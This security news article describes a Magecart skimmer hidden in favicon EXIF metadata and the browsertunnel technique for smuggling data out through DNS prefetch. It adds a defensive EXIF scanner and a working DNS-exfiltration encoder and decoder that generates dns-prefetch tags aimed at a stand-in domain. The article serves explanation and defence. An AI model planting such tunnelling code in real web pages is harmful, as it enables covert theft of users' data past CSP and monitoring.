In a novel web-skimming campaign, attackers are hiding malicious code in image file metadata to steal payment card data from online shoppers.

“We found stealth code within the metadata of an image file (a form of steganography) and surreptitiously uploaded by compromised online stores,” the Malwarebytes researchers said.

“This scheme would not be complete without another interesting variation to extract data from stolen credit cards. Once again, criminals used the disguise of an image file to collect their loot.”

This is the latest twist in a type of operation widely known as web skimming or a Magecart attack, in which criminals keep finding new ways to inject JavaScript into e-commerce sites, for example through misconfigured AWS S3 storage buckets, and abuse Content Security Policy (CSP) allow-lists to send the stolen data to a Google Analytics account under their own control.

Web skimming generally works by injecting malicious JavaScript into a compromised website; the script silently collects what users type into forms and sends it to a server run by the attackers, giving them access to shoppers' payment details. Steganography adds a layer on top: the script is hidden inside a file that looks harmless.

In this campaign, the security company found that the skimmer was not only present on an online store running the WooCommerce WordPress plugin, but was hidden in the EXIF (Exchangeable Image File Format) metadata of a favicon served from a suspicious domain (cddn.site).

EXIF data embedded in an image describes the image itself: the make and model of the camera, the date and time the photo was taken, location, resolution, camera settings and other details.

In this case the attackers used that metadata as a hiding place: the skimmer's JavaScript was stored in the “Copyright” field of the favicon's EXIF data and executed from there.
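As an added illustration, and not code from Malwarebytes or from the skimmer itself, the following Node.js script shows how a defender can audit an image's EXIF text fields for code-like content. It walks the JPEG segments to the APP1/Exif block, parses IFD0 and flags any ASCII tag, the “Copyright” tag (0x8298) included, that looks like JavaScript. EXIF is carried by JPEG (and TIFF) containers, so the example assumes the favicon is a JPEG served under a .ico name; PNG or ICO files would need a different parser. The fixture builder, the regex heuristics and the sample payload (a generic eval() wrapper, not the WiseLoop-obfuscated skimmer) are assumptions for illustration.

```javascript
// Added example: find the EXIF "Copyright" tag (0x8298) in a JPEG and flag
// script-like content. Not the skimmer's own code; fixture and heuristics are
// assumptions for illustration.
const COPYRIGHT_TAG = 0x8298;
const SCRIPT_HINTS = /function\s*\(|eval\(|document\.|XMLHttpRequest|fetch\(|<script|\bvar\s+\w+\s*=/i;

// Walk JPEG segments until the APP1/Exif segment (or the start of scan data) and
// return every ASCII-typed IFD0 tag as { tagId: string }.
function exifAsciiTags(jpeg) {
  if (jpeg[0] !== 0xff || jpeg[1] !== 0xd8) throw new Error('not a JPEG (no SOI marker)');
  let pos = 2;
  while (pos + 4 <= jpeg.length) {
    if (jpeg[pos] !== 0xff) throw new Error('corrupt marker at offset ' + pos);
    const marker = jpeg[pos + 1];
    if (marker === 0xd9 || marker === 0xda) break; // EOI or SOS: no more metadata segments
    const segLen = jpeg.readUInt16BE(pos + 2);    // length field includes its own two bytes
    const seg = jpeg.subarray(pos + 4, pos + 2 + segLen);
    if (marker === 0xe1 && seg.subarray(0, 6).equals(Buffer.from('Exif\0\0'))) {
      return parseIfd0(seg.subarray(6));
    }
    pos += 2 + segLen;
  }
  return {};
}

// Minimal TIFF/IFD0 reader: honours the byte-order mark, keeps only ASCII (type 2) entries.
function parseIfd0(tiff) {
  const order = tiff.subarray(0, 2).toString('latin1');
  if (order !== 'II' && order !== 'MM') throw new Error('bad TIFF byte order');
  const u16 = (o) => (order === 'II' ? tiff.readUInt16LE(o) : tiff.readUInt16BE(o));
  const u32 = (o) => (order === 'II' ? tiff.readUInt32LE(o) : tiff.readUInt32BE(o));
  if (u16(2) !== 42) throw new Error('bad TIFF magic');
  const ifd = u32(4);
  const count = u16(ifd);
  const tags = {};
  for (let i = 0; i < count; i += 1) {
    const e = ifd + 2 + 12 * i;
    const tag = u16(e), type = u16(e + 2), n = u32(e + 4);
    if (type !== 2) continue;
    // values of 4 bytes or fewer live inline in the entry, longer ones at an offset
    const value = n <= 4 ? tiff.subarray(e + 8, e + 8 + n) : tiff.subarray(u32(e + 8), u32(e + 8) + n);
    tags[tag] = value.toString('latin1').replace(/\0+$/, '');
  }
  return tags;
}

// Report text tags that look like code rather than a caption or a copyright notice.
function scanExifForScript(jpeg) {
  const findings = [];
  for (const [tag, value] of Object.entries(exifAsciiTags(jpeg))) {
    if (SCRIPT_HINTS.test(value) || value.length > 512) {
      findings.push({ tag: '0x' + Number(tag).toString(16), preview: value.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed fixture: a minimal JPEG (SOI + APP1/Exif + EOI) whose IFD0 holds a
// single Copyright tag. Not a real image, but enough for the parser above.
function buildJpegWithCopyright(text) {
  const value = Buffer.from(text + '\0', 'latin1');
  const payloadOff = 8 + 2 + 12 + 4;   // TIFF header, entry count, one entry, next-IFD pointer
  const entry = Buffer.alloc(12);
  entry.writeUInt16BE(COPYRIGHT_TAG, 0);
  entry.writeUInt16BE(2, 2);           // type 2 = ASCII
  entry.writeUInt32BE(value.length, 4);
  if (value.length <= 4) value.copy(entry, 8); else entry.writeUInt32BE(payloadOff, 8);
  const header = Buffer.from('MM\0\x2a\0\0\0\x08', 'latin1');  // big-endian, IFD0 at offset 8
  const tiff = Buffer.concat([header, Buffer.from([0, 1]), entry, Buffer.alloc(4),
    value.length > 4 ? value : Buffer.alloc(0)]);
  const app1 = Buffer.concat([Buffer.from('Exif\0\0', 'latin1'), tiff]);
  const len = Buffer.alloc(2);
  len.writeUInt16BE(app1.length + 2, 0);
  return Buffer.concat([Buffer.from([0xff, 0xd8, 0xff, 0xe1]), len, app1, Buffer.from([0xff, 0xd9])]);
}
```

To use it against a real file, pass `fs.readFileSync(path)` to `scanExifForScript`; a benign favicon yields an empty list, while a Copyright field holding something like `eval(function(...){...})` is reported with the tag id and a preview. The length check catches the case where the obfuscator's output avoids every keyword in the regex: legitimate copyright notices are short, skimmers are not.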

“As with other skimmers, this one also captures the content of input fields where online shoppers enter their name, billing address, and credit card details,” the researchers said.

The captured data is Base64-encoded and the resulting string reversed, and the result is then sent to the attackers' server disguised as an image file request, so that the exfiltration blends in with ordinary traffic.

Suggesting that the operation may be the work of Magecart Group 9, Malwarebytes said the skimmer's JavaScript is obfuscated with the WiseLoop PHP JS Obfuscator library.

This is not the first time Magecart groups have used images as an attack vector against e-commerce websites. In May, several hacked websites were observed loading a malicious favicon on their checkout pages and then replacing the legitimate payment form with a fraudulent one that stole card data.

Abusing DNS to exfiltrate data from the browser
In a separate technique, researcher Jessie Li demonstrates that data can be smuggled out of the browser by abusing dns-prefetch, a latency-reduction feature that lets a page ask the browser to resolve cross-origin domain names before any resource from them is requested.

Called “browsertunnel”, the open source tool consists of a server that decodes the messages it receives and a client-side JavaScript library that encodes and transmits them.

The messages themselves are arbitrary strings encoded as subdomains of a domain whose DNS queries reach the tool's server; the browser resolves those names as prefetch lookups. The server listens for the incoming DNS queries, collects the encoded messages and decodes them to recover the data.

In other words, browsertunnel can be used to collect sensitive information as users interact with a web page and then exfiltrate it to a server, with the transfer disguised as DNS traffic.

“DNS traffic does not appear in browser debugging tools, is not blocked by a page’s Content Security Policy (CSP), and is often not inspected by firewalls or corporate proxies, making it an ideal medium for data smuggling in restricted scenarios,” said the researcher.
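The encoding and decoding steps of such a tunnel, as an added example that is not browsertunnel's own code: the client side turns an arbitrary string into hostnames that respect DNS limits (63-byte labels and 253-byte names, per RFC 1035) and would hand each one to the browser as a `<link rel="dns-prefetch">` element; the server side rebuilds the message from the query names its nameserver sees, in any order and with the duplicates that resolver retries produce. A small detector for DNS logs is included for the defensive side. The hex payload encoding, the label layout `<seq>.<data labels>.<session>.<base domain>`, the hypothetical base domain `tunnel.example` and the constructed sample messages are assumptions for illustration; browsertunnel's own wire format may differ.

```javascript
// Added example (not browsertunnel's code): push an arbitrary string through DNS
// from a web page and recover it on the nameserver side. Base domain, label layout
// and hex encoding are assumptions for illustration.
const BASE_DOMAIN = 'tunnel.example';  // hypothetical; its nameserver is where queries are read
const MAX_LABEL = 63;                  // RFC 1035 label limit
const MAX_NAME = 253;                  // practical limit for a full host name

// Client side: split the message into hostnames, each within DNS size limits.
function encodeMessage(message, sessionId) {
  const hex = Buffer.from(message, 'utf8').toString('hex');
  const suffix = `.${sessionId}.${BASE_DOMAIN}`;
  const names = [];
  let seq = 0;
  let pos = 0;
  while (pos < hex.length) {
    const labels = [];
    // bytes left for data labels once the sequence label and the suffix are accounted for
    let budget = MAX_NAME - suffix.length - String(seq).length - 1;
    while (pos < hex.length && budget > 1) {
      const take = Math.min(MAX_LABEL, budget - 1, hex.length - pos);
      labels.push(hex.slice(pos, pos + take));
      pos += take;
      budget -= take + 1;  // +1 for the separating dot
    }
    names.push(`${seq}.${labels.join('.')}${suffix}`);
    seq += 1;
  }
  return names;
}

// What the client library would inject into the page: the browser resolves each
// name ahead of time, and that lookup is the exfiltration.
function prefetchTags(names) {
  return names.map((n) => `<link rel="dns-prefetch" href="//${n}">`);
}

// Server side: given the query names seen by the nameserver (any order, retries
// included, possibly upper-cased or with a trailing dot), rebuild the message.
// Returns null while nothing has arrived or a sequence number is still missing.
function decodeQueries(queryNames, sessionId) {
  const suffix = `.${sessionId}.${BASE_DOMAIN}`;
  const chunks = new Map();
  for (const raw of queryNames) {
    const name = raw.toLowerCase().replace(/\.$/, '');
    if (!name.endsWith(suffix)) continue;
    const labels = name.slice(0, -suffix.length).split('.');
    const seq = Number(labels.shift());
    if (!Number.isInteger(seq)) continue;
    chunks.set(seq, labels.join(''));  // a retried query carries identical data, so overwriting is safe
  }
  if (chunks.size === 0) return null;
  const seqs = [...chunks.keys()].sort((a, b) => a - b);
  for (let i = 0; i < seqs.length; i += 1) if (seqs[i] !== i) return null;
  return Buffer.from(seqs.map((s) => chunks.get(s)).join(''), 'hex').toString('utf8');
}

// Defender side: a crude tell for this kind of tunnel in DNS logs, a query whose
// labels are long and purely hex (real host names rarely look like that).
function looksLikeTunnel(name) {
  return name.split('.').some((label) => label.length >= 32 && /^[0-9a-f]+$/i.test(label));
}
```

The message never appears in a request body or a URL, which is why CSP and the network panel do not see it: from the page's point of view nothing was fetched, a name was merely resolved. On the defensive side, the same property means the only place to look is the resolver's query log, where `looksLikeTunnel` or an entropy check over labels is a reasonable first filter.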
